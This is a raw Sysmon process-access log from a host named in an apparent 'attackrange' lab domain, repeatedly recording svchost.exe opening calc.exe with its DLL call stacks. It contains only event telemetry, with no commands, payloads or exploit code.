10341000x8000000000000000360139Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360138Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360137Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360136Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360135Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360134Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360133Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360132Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360131Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360130Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360129Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360128Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360127Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360126Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360125Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360124Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360123Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360122Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360121Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360120Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360119Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360118Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
